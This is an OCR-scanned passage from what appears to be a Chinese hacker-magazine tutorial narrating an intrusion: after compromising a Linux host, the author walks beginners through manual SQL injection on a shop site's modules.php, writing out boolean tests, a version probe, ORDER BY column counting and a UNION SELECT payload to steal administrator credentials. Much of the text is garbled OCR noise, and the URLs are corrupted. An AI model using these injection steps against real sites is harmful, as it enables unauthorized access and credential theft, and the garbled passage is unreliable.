如发现有乱码，请点击下面链接浏览原文
正文摘录:

上传成功的那一刻，我可是兴奋的没法用语言’表图7很轻松的就弄到了一只Linux肉鸡，心情大好，早就把老大的阴影给：毒光了。接下来就是搜索一下使用这套整站系统的网站了。我迫不及待的打开GOOGLE，突然一个问题冒了出来。我即使找到了网站，可没有管理员密码进入不了后台岂不是白费。入侵的思路一下子被打断了，刚才的好心情又被老大习f5邪恶的嘴脸给取代了。我思索了一会儿，不就是没有用户名和密码吗，有什么大不了的，找个注入点不就行了吗。可是说起来容易做起来难呀，我左逛逛，右逛逛，最后在讨论区里发现了点蛛丝马迹，如图8。赞辫嘲嘲糍籀臻誊瓣辫麓戮黪2007-C4.岱2330r至鄙鞠匿1~O?-01.311543—鞠孺蠢1∞略ln241226厂至丽霜露]2∞自102412：22r至砰嗣g『]2006-10-N12：18厂至丽嗣~1G231816几飘孺i票]厂1弱圈墓薪至嚣_]搛小毛蝮是徊测腻瓤息，靖匀理曹(9麓目慝)sswwm(0篇匣鳓，蹙用兄鼋子商魏9i前量(：庸回鏖)群七拥路上的商店由如何才能成功晚t(1篇回慝)，l毫关稿自建两j旁圭胃站自l重要性(.篇回鞠★m黜^薯翠暑岳著“黜站嚣。我艇蒯何蚀“图8随便了点了一个问题，来看看它的地址，如图9，是不是出现了13h137id=的格式啊。那么我们就在后面加个“’”号，看看返回什么样的信息吧。居然没有任何变化，那就是说这儿没有注入漏洞吗?小菜们可千万不要被骗了哟。“PHP?”后面的参数有那么多，我们必须在每个参数后面都加个“…’号，如果这样都没有反映的话，那就只能换其它的链接了。当我在图10接着继续提交httP：／／demo.}}}}.com.tW／shop／modules.php?op=loadmodule&name=content＆file=index&func=discuss&ection=respeet&Dcs—id=12and'=1／}＆currentPege=1，返回了正常页面，再提交http：／／demo.木幸枣}.com.tw／shop／moduIes.php?op=Ioedmodule＆name=content&file=index&func=discuss&ecti0n=resPect＆DOSid=12end1=2／}¤tPSge=1，返回出错的话，那这个链接地址就能够注入。接着就该手工注入来发挥作用r，当然了菜鸟们也可以使用工具。下面就跟着我一起去把管理员的I张号密码搞到手。首先，我们要看看这个网站的数据库版本，为什么呢?因为数据库版本在4.0.0以上的话，就能够使用联合查询uni0n了，会省下很多的时间和精力。提交httP：／／demo.}}{}.com。tW／Sh0P／modules.php?op=loadmodule&name=content＆file=index&func=discuss＆action=respect&Dcsid=12andord(mid(version()，1，1))＞51／*¤tpage=1，页面返回正常。这证明了数据库版本高于3，那么就能使用union了。接着提交http：／／demo.¨}}.com.tW／shop／moduIes.php?op=loadmodule&name=content&file=index&func=discuss&action=respect＆Dcs—id=12OrderbY10／}¤tpage=1，返回出错，说明字段是小于l0个的。在提交httP：／／demo.}}}}.com.tw／shop／modules.php?op=loadmodule&name=content&file=index＆func=discuss＆action=respect＆DcSid=12orderbY5／}¤tpage=1，返同正常，说明字段是大于5个的，依此类推，我们在字段8的时候返回正常，9的时候返回出错，终于猜测到字段基本上是8_r!这里说基本卜是因为有些字段是不能排序的，所以还需要使用uniOn精确定位字段数字是8，继续提交httP：／／dSmo.}}{$.com.tW／Shop／modules.php?op=loadmodule&name=content＆fiIe=index＆func=discuss.&action=respect&Dosid=12and1=2unionselect1，2，3，4，5，6，7，8／*¤tpage=l，返回结果如图lI所示。哈哈，成功了哦!哪些字段会在页面上显示也是一目了然r!正当我开心的时候，麻烦又来了。我居然猜不到表名，可能是我入行爪浅的缘故吧。正当我安慰自己的时候，聪明的头脑义一次发挥了作用。我们不是已经拿到]’那个线上展示的网站的wESI{ELI。了Ⅱ弓，那黪骥潍鬻